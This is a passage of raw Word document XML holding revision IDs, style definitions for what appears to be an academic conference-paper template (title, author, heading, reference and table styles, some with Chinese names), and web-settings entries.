    <w:rsid w:val="00DC583E"/>
    <w:rsid w:val="00DC73F2"/>
    <w:rsid w:val="00DD232F"/>
    <w:rsid w:val="00DD329D"/>
    <w:rsid w:val="00DD5B9F"/>
    <w:rsid w:val="00DD6794"/>
    <w:rsid w:val="00DD78F3"/>
    <w:rsid w:val="00DD7B8D"/>
    <w:rsid w:val="00DE608D"/>
    <w:rsid w:val="00DE636B"/>
    <w:rsid w:val="00DF0FBC"/>
    <w:rsid w:val="00DF10DB"/>
    <w:rsid w:val="00DF161B"/>
    <w:rsid w:val="00DF46A9"/>
    <w:rsid w:val="00E002FE"/>
    <w:rsid w:val="00E03BFB"/>
    <w:rsid w:val="00E05F87"/>
    <w:rsid w:val="00E06D3B"/>
    <w:rsid w:val="00E1054E"/>
    <w:rsid w:val="00E109A9"/>
    <w:rsid w:val="00E112BD"/>
    <w:rsid w:val="00E11D26"/>
    <w:rsid w:val="00E13314"/>
    <w:rsid w:val="00E161E0"/>
    <w:rsid w:val="00E16715"/>
    <w:rsid w:val="00E21099"/>
    <w:rsid w:val="00E23109"/>
    <w:rsid w:val="00E24612"/>
    <w:rsid w:val="00E26FF4"/>
    <w:rsid w:val="00E27BB9"/>
    <w:rsid w:val="00E33459"/>
    <w:rsid w:val="00E33A69"/>
    <w:rsid w:val="00E416D7"/>
    <w:rsid w:val="00E473CC"/>
    <w:rsid w:val="00E47AE4"/>
    <w:rsid w:val="00E47B58"/>
    <w:rsid w:val="00E50621"/>
    <w:rsid w:val="00E50DDF"/>
    <w:rsid w:val="00E51DE5"/>
    <w:rsid w:val="00E561AC"/>
    <w:rsid w:val="00E60756"/>
    <w:rsid w:val="00E631B4"/>
    <w:rsid w:val="00E63905"/>
    <w:rsid w:val="00E64101"/>
    <w:rsid w:val="00E6662D"/>
    <w:rsid w:val="00E66708"/>
    <w:rsid w:val="00E670AE"/>
    <w:rsid w:val="00E72D50"/>
    <w:rsid w:val="00E75BBE"/>
    <w:rsid w:val="00E75C7A"/>
    <w:rsid w:val="00E82E75"/>
    <w:rsid w:val="00E90798"/>
    <w:rsid w:val="00E9457B"/>
    <w:rsid w:val="00E95C8D"/>
    <w:rsid w:val="00E961BA"/>
    <w:rsid w:val="00E96270"/>
    <w:rsid w:val="00E96D38"/>
    <w:rsid w:val="00E96E8A"/>
    <w:rsid w:val="00EA098C"/>
    <w:rsid w:val="00EA0E50"/>
    <w:rsid w:val="00EA1494"/>
    <w:rsid w:val="00EB056C"/>
    <w:rsid w:val="00EB0F5F"/>
    <w:rsid w:val="00EB12CD"/>
    <w:rsid w:val="00EB32E8"/>
    <w:rsid w:val="00EB39AB"/>
    <w:rsid w:val="00EB3AB8"/>
    <w:rsid w:val="00EB43EA"/>
    <w:rsid w:val="00EB4887"/>
    <w:rsid w:val="00EC37C4"/>
    <w:rsid w:val="00EC44EA"/>
    <w:rsid w:val="00EC55AE"/>
    <w:rsid w:val="00EC5984"/>
    <w:rsid w:val="00EC6392"/>
    <w:rsid w:val="00ED05C8"/>
    <w:rsid w:val="00ED1584"/>
    <w:rsid w:val="00ED1756"/>
    <w:rsid w:val="00ED1BC9"/>
    <w:rsid w:val="00ED2DE6"/>
    <w:rsid w:val="00ED300B"/>
    <w:rsid w:val="00ED4133"/>
    <w:rsid w:val="00ED486F"/>
    <w:rsid w:val="00ED4F0D"/>
    <w:rsid w:val="00ED6C09"/>
    <w:rsid w:val="00ED6EB9"/>
    <w:rsid w:val="00ED6FCF"/>
    <w:rsid w:val="00EE40D0"/>
    <w:rsid w:val="00EF03BD"/>
    <w:rsid w:val="00EF1ACD"/>
    <w:rsid w:val="00EF3B1A"/>
    <w:rsid w:val="00EF77F4"/>
    <w:rsid w:val="00EF7F80"/>
    <w:rsid w:val="00F01BF3"/>
    <w:rsid w:val="00F0495B"/>
    <w:rsid w:val="00F101E4"/>
    <w:rsid w:val="00F110CC"/>
    <w:rsid w:val="00F13438"/>
    <w:rsid w:val="00F14234"/>
    <w:rsid w:val="00F147C1"/>
    <w:rsid w:val="00F17D5D"/>
    <w:rsid w:val="00F20C3E"/>
    <w:rsid w:val="00F21236"/>
    <w:rsid w:val="00F271A1"/>
    <w:rsid w:val="00F364D6"/>
    <w:rsid w:val="00F406F2"/>
    <w:rsid w:val="00F4316B"/>
    <w:rsid w:val="00F45A59"/>
    <w:rsid w:val="00F53C46"/>
    <w:rsid w:val="00F542E0"/>
    <w:rsid w:val="00F545F3"/>
    <w:rsid w:val="00F55EF0"/>
    <w:rsid w:val="00F57041"/>
    <w:rsid w:val="00F57EBF"/>
    <w:rsid w:val="00F6108B"/>
    <w:rsid w:val="00F61746"/>
    <w:rsid w:val="00F64AB5"/>
    <w:rsid w:val="00F741B2"/>
    <w:rsid w:val="00F77274"/>
    <w:rsid w:val="00F80A6B"/>
    <w:rsid w:val="00F87959"/>
    <w:rsid w:val="00F90E7F"/>
    <w:rsid w:val="00F910B6"/>
    <w:rsid w:val="00F932BF"/>
    <w:rsid w:val="00F93A89"/>
    <w:rsid w:val="00F96C57"/>
    <w:rsid w:val="00FA148D"/>
    <w:rsid w:val="00FA2F43"/>
    <w:rsid w:val="00FA54AA"/>
    <w:rsid w:val="00FA68C0"/>
    <w:rsid w:val="00FB3414"/>
    <w:rsid w:val="00FB49A6"/>
    <w:rsid w:val="00FB6757"/>
    <w:rsid w:val="00FB79D5"/>
    <w:rsid w:val="00FB7A9F"/>
    <w:rsid w:val="00FC07AF"/>
    <w:rsid w:val="00FC369A"/>
    <w:rsid w:val="00FD2051"/>
    <w:rsid w:val="00FD2B99"/>
    <w:rsid w:val="00FD36F4"/>
    <w:rsid w:val="00FD3724"/>
    <w:rsid w:val="00FD3D03"/>
    <w:rsid w:val="00FD77D4"/>
    <w:rsid w:val="00FE018F"/>
    <w:rsid w:val="00FE03F4"/>
    <w:rsid w:val="00FE1445"/>
    <w:rsid w:val="00FE15EC"/>
    <w:rsid w:val="00FE2D45"/>
    <w:rsid w:val="00FE3B5A"/>
    <w:rsid w:val="00FE3ED2"/>
    <w:rsid w:val="00FF0335"/>
    <w:rsid w:val="00FF070B"/>
    <w:rsid w:val="00FF339B"/>
    <w:rsid w:val="00FF6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176F2F-9DB0-419F-9173-D53C8055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CAB"/>
    <w:pPr>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="18"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:qFormat/>
    <w:rsid w:val="00462A1D"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="216"/>
        <w:tab w:val="num" w:pos="576"/>
      </w:tabs>
      <w:spacing w:before="160" w:after="80"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:smallCaps/>
      <w:noProof/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="2Char"/>
    <w:qFormat/>
    <w:rsid w:val="009C315D"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="5"/>
      </w:numPr>
      <w:spacing w:before="120" w:after="60"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:noProof/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="3Char"/>
    <w:qFormat/>
    <w:rsid w:val="009C315D"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="6"/>
      </w:numPr>
      <w:spacing w:line="240" w:lineRule="exact"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:noProof/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:qFormat/>
    <w:rsid w:val="009C315D"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="7"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="720"/>
      </w:tabs>
      <w:spacing w:before="40" w:after="40"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:noProof/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:qFormat/>
    <w:rsid w:val="009C315D"/>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C315D"/>
    <w:pPr>
      <w:spacing w:after="200"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Affiliation">
    <w:name w:val="Affiliation"/>
    <w:rsid w:val="009C315D"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Author">
    <w:name w:val="Author"/>
    <w:rsid w:val="009C315D"/>
    <w:pPr>
      <w:spacing w:before="360" w:after="40"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:noProof/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a3">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char"/>
    <w:rsid w:val="009C315D"/>
    <w:pPr>
      <w:spacing w:after="120" w:line="228" w:lineRule="auto"/>
      <w:ind w:firstLine="288"/>
    </w:pPr>
    <w:rPr>
      <w:spacing w:val="-1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="bulletlist">
    <w:name w:val="bullet list"/>
    <w:basedOn w:val="a3"/>
    <w:rsid w:val="009C315D"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="equation">
    <w:name w:val="equation"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="009C315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C315D"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:spacing w:before="80" w:after="200"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:noProof/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="footnote">
    <w:name w:val="footnote"/>
    <w:rsid w:val="009C315D"/>
    <w:pPr>
      <w:framePr w:hSpace="187" w:vSpace="187" w:wrap="notBeside" w:vAnchor="text" w:hAnchor="page" w:x="6121" w:y="577"/>
      <w:numPr>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:spacing w:after="40"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="keywords">
    <w:name w:val="key words"/>
    <w:rsid w:val="009C315D"/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:ind w:firstLine="288"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:noProof/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="papersubtitle">
    <w:name w:val="paper subtitle"/>
    <w:rsid w:val="009C315D"/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="MS Mincho"/>
      <w:noProof/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="papertitle">
    <w:name w:val="paper title"/>
    <w:rsid w:val="009C315D"/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="MS Mincho"/>
      <w:noProof/>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="references">
    <w:name w:val="references"/>
    <w:rsid w:val="009C315D"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="8"/>
      </w:numPr>
      <w:spacing w:after="50" w:line="180" w:lineRule="exact"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="MS Mincho"/>
      <w:noProof/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="sponsors">
    <w:name w:val="sponsors"/>
    <w:rsid w:val="009C315D"/>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sid w:val="009C315D"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="tablecolsubhead">
    <w:name w:val="table col subhead"/>
    <w:basedOn w:val="tablecolhead"/>
    <w:rsid w:val="009C315D"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="15"/>
      <w:szCs w:val="15"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="tablecopy">
    <w:name w:val="table copy"/>
    <w:rsid w:val="009C315D"/>
    <w:pPr>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:noProof/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="tablefootnote">
    <w:name w:val="table footnote"/>
    <w:rsid w:val="009C315D"/>
    <w:pPr>
      <w:spacing w:before="60" w:after="30"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="12"/>
      <w:szCs w:val="12"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="tablehead">
    <w:name w:val="table head"/>
    <w:rsid w:val="009C315D"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="9"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="120" w:line="216" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:smallCaps/>
      <w:noProof/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a4">
    <w:name w:val="Hyperlink"/>
    <w:rsid w:val="001A1098"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="caption"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00CB65AE"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a6">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char0"/>
    <w:rsid w:val="00105669"/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char0">
    <w:name w:val="页眉 Char"/>
    <w:link w:val="a6"/>
    <w:rsid w:val="00105669"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char1"/>
    <w:rsid w:val="00105669"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char1">
    <w:name w:val="页脚 Char"/>
    <w:link w:val="a7"/>
    <w:rsid w:val="00105669"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="2Char">
    <w:name w:val="标题 2 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="2"/>
    <w:rsid w:val="00137530"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:noProof/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char">
    <w:name w:val="正文文本 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a3"/>
    <w:rsid w:val="00137530"/>
    <w:rPr>
      <w:spacing w:val="-1"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="3Char">
    <w:name w:val="标题 3 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="3"/>
    <w:rsid w:val="00620575"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:noProof/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a8">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char2"/>
    <w:rsid w:val="0046741B"/>
    <w:rPr>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char2">
    <w:name w:val="批注框文本 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a8"/>
    <w:rsid w:val="0046741B"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Default">
    <w:name w:val="Default"/>
    <w:rsid w:val="00C62616"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a9">
    <w:name w:val="Title"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="Char3"/>
    <w:qFormat/>
    <w:rsid w:val="004750D3"/>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rsid w:val="004750D3"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aa">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00CC2926"/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="ab">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:rsid w:val="00F13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0761">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="128284100">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="247009997">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="345178258">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="354120334">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="367604417">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="368650339">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="430931187">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="437263995">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="514225872">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="540485338">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="552236775">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="577518111">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="637343644">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="651909934">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="768938475">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="772746831">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
